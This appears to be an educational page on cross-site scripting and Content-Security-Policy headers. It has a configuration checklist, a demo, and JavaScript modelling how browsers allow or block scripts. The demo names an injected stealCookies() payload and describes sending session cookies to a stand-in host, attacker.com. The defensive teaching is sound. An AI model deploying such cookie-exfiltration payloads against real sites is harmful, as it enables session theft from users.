Without a Content-Security-Policy header, any injected script executes freely. One vulnerable comment field is all it takes.
XSS (Cross-Site Scripting) means an attacker gets their JavaScript to run on your page. This can happen through comment fields, search boxes, URL parameters, or any input that gets reflected back into the page.
Without CSP, the browser has no way to know which scripts are legitimate and which were injected by an attacker. It runs all of them. With CSP, the server tells the browser: "Only run scripts I explicitly approve." An injected <script> tag or onerror handler is blocked before it executes.
Try it: Type an XSS payload into the comment field below. Toggle between no-CSP and CSP modes to see the difference.
Checklist:
- Content-Security-Policy header returned on every HTML response
- nginx: add_header Content-Security-Policy "default-src 'self'; script-src 'self'" always;
- Apache: Header always set Content-Security-Policy "default-src 'self'"
- Use Content-Security-Policy-Report-Only to audit before enforcing
- Avoid 'unsafe-inline', which weakens CSP by allowing exactly the inline scripts an injection produces
- frame-ancestors 'self' to prevent clickjacking (replaces X-Frame-Options)

Demo result (no-CSP mode): stealCookies() was called. In a real attack this function would:
- read document.cookie to get the session token
- send it to https://attacker.com/steal?c=SESSION
Every student and teacher who loads this page would be affected, not just the person who submitted the comment.
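To make the "only run scripts I explicitly approve" rule concrete, here is an added example (not code from the demo page) that models how a browser applies the page's script-src policies above to each script it meets. It handles only the source types the page discusses ('self', 'unsafe-inline', host sources, fallback to default-src); the page origin and script URLs are constructed for the scenario.

```javascript
// Parse a CSP header such as "default-src 'self'; script-src 'self'" into
// { "default-src": ["'self'"], "script-src": ["'self'"] }.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Origin of a host source like "https://cdn.example"; null for forms this
// simplified model does not handle (e.g. bare scheme "https:" or wildcards).
function sourceOrigin(source) {
  try { return new URL(source).origin; } catch { return null; }
}

// Decide whether one script may run. `script` is { inline: true } for an
// inline <script> body or an onerror= handler, or { src: "https://..." } for
// an external script. `pageOrigin` is the origin that served the document.
function scriptAllowed(header, script, pageOrigin) {
  const csp = parseCsp(header);
  const sources = csp["script-src"] ?? csp["default-src"];
  if (sources === undefined) return true; // no CSP: the browser runs everything
  if (script.inline) return sources.includes("'unsafe-inline'");
  const origin = new URL(script.src).origin;
  return sources.some((s) =>
    (s === "'self'" && origin === pageOrigin) ||
    (!s.startsWith("'") && sourceOrigin(s) === origin)
  );
}

// Constructed scenario: the comment-field payload from the demo, checked against
// the page's nginx policy and against the weakened 'unsafe-inline' variant.
const PAGE_ORIGIN = "https://school.example"; // hypothetical origin of the demo page
const STRICT = "default-src 'self'; script-src 'self'";
const WEAK = "default-src 'self'; script-src 'self' 'unsafe-inline'";
const injected = { inline: true };                             // <script>stealCookies()</script>
const appScript = { src: "https://school.example/app.js" };     // the site's own script
const attackerScript = { src: "https://attacker.com/steal.js" }; // third-party script

console.log(scriptAllowed(STRICT, injected, PAGE_ORIGIN));       // false: inline blocked
console.log(scriptAllowed(STRICT, appScript, PAGE_ORIGIN));      // true: 'self' matches
console.log(scriptAllowed(STRICT, attackerScript, PAGE_ORIGIN)); // false: origin not listed
console.log(scriptAllowed(WEAK, injected, PAGE_ORIGIN));         // true: 'unsafe-inline' reopens the hole
console.log(scriptAllowed("", injected, PAGE_ORIGIN));           // true: no header at all
```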